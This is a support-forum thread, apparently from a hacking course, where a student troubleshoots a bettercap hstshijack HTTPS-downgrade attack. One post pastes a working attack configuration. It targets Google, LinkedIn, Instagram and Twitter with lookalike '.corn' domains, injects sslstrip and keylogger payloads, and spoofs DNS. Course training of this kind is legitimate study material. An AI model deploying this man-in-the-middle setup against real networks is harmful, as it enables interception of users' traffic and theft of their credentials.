Tagged: HSTSHIJACK
- This topic has 40 replies, 2 voices, and was last updated 11 months ago by Diego Pérez.
- AuthorPosts
- October 9, 2023 at 8:10 am #89647lucmarroucheParticipant
Hi,
I am having a hard time with downgrading https to http using HS…, the result says “not enough hstshijack replacements (got 9).
October 9, 2023 at 10:23 pm #89888Diego PérezModeratorHi!
Avoid asking the same in different threads please.Can you share a screenshot of the error please?
Thanks!
DiegoOctober 10, 2023 at 7:32 am #89892lucmarroucheParticipantHello Diego and thank you so much for replying back, here are some pics of the process, these sites arent going from https to http.
October 10, 2023 at 7:33 am #89893lucmarroucheParticipanthere pic 2
October 10, 2023 at 7:33 am #89894lucmarroucheParticipantand pic 3
October 10, 2023 at 9:03 pm #90112Diego PérezModeratorHi!
The screenshots weren’t uploaded, they are too big. They need to have a maximum size of 1MB. So try it again.Greetings!
DiegoOctober 19, 2023 at 1:59 am #91752lucmarroucheParticipantHello Diego, did you receive the pics for the https to http, I am still trying to figure out why it isnt working, thank you
October 21, 2023 at 1:38 am #92229Diego PérezModeratorHi!
As mentioned above they weren’t uploaded because they might exceed the 1MB limit size, so you need to resize them to be able to upload them. Otherwise upload them to google drive and share the link here.Greetings!
DiegoOctober 24, 2023 at 6:43 am #93118lucmarroucheParticipantHi again,
Here is a better and more recent screen shot
October 24, 2023 at 9:19 pm #93352Diego PérezModeratorHi!
Unfortunately that screenshot is unreadable, it might be better to upload the to google drive and share a link here.Greetings!
DiegoOctober 24, 2023 at 9:35 pm #93355lucmarroucheParticipantOctober 25, 2023 at 8:50 pm #93564Diego PérezModeratorHi!
No, it doesn’t allow me to see it, change permissions of the file to Anyone who has the link.Greetings!
DiegoOctober 26, 2023 at 9:33 pm #93772Diego PérezModeratorHi!
You need to share the info here in case someone else (I meant someone from zSecurity team) looks at your question. Just set the permissions as I mentioned above and we’ll be able to see it.Greetings!
DiegoOctober 27, 2023 at 4:10 am #93774lucmarroucheParticipant# Documentation can be found at https://github.com/bettercap/caplets/tree/master/hstshijack
# Domains assigned to ‘hstshijack.targets’, ‘hstshijack.blockscripts’ and ‘hstshijack.payloads’
# variables get precendence over those assigned to the ‘hstshijack.ignore’ variable.
set hstshijack.targets google.com, *.google.com, gstatic.com, *.gstatic.com, linkedin.com, *.linkedin.com, instagram.com, *.instagram.com, twitter.com, *.twitter.com
set hstshijack.replacements google.corn, *.google.corn, gstatic.corn, *.gstatic.corn, linkedin.corn, *.linkedin.corn, instagram.corn, *.instagram.corn, twitter.corn, *.twitter.corn
set hstshijack.ssl.domains /usr/share/bettercap/caplets/hstshijack/domains.txt
set hstshijack.ssl.index /usr/share/bettercap/caplets/hstshijack/index.json
set hstshijack.ssl.check true
#set hstshijack.blockscripts example.com,*.example.com
set hstshijack.obfuscate true
set hstshijack.payloads *:/usr/share/bettercap/caplets/hstshijack/payloads/hijack.js,*:/usr/share/bettercap/caplets/hstshijack/payloads/sslstrip.js,*:/usr/share/bettercap/caplets/hstshijack/payloads/keylogger.js,*.google.com:/usr/share/bettercap/caplets/hstshijack/payloads/google-search.js,google.com:/usr/share/bettercap/caplets/hstshijack/payloads/google-search.js
set hstshijack.ignore captive.apple.com,connectivitycheck.gstatic.com,detectportal.firefox.com,www.msftconnecttest.comset http.proxy.script /usr//share/bettercap/caplets/hstshijack/hstshijack.js
http.proxy onset dns.spoof.domains google.corn, *.google.corn, gstatic.corn, *.gstatic.corn, linkedin.corn, *.linkedin.corn, instagram.corn, *.instagram.corn, twitter.corn, *.twitter.corn
set dns.spoof.all true
dns.spoof onOctober 27, 2023 at 11:10 pm #93955Diego PérezModeratorHi!
That looks like the original hstshijack caplet, as mentioned in the course you need to use the custom one or the attack won’t work. I suggest to download and import custom kali which already has the custom caplet. Then try the attack again.Greetings!
Diego - AuthorPosts
- You must be logged in to reply to this topic.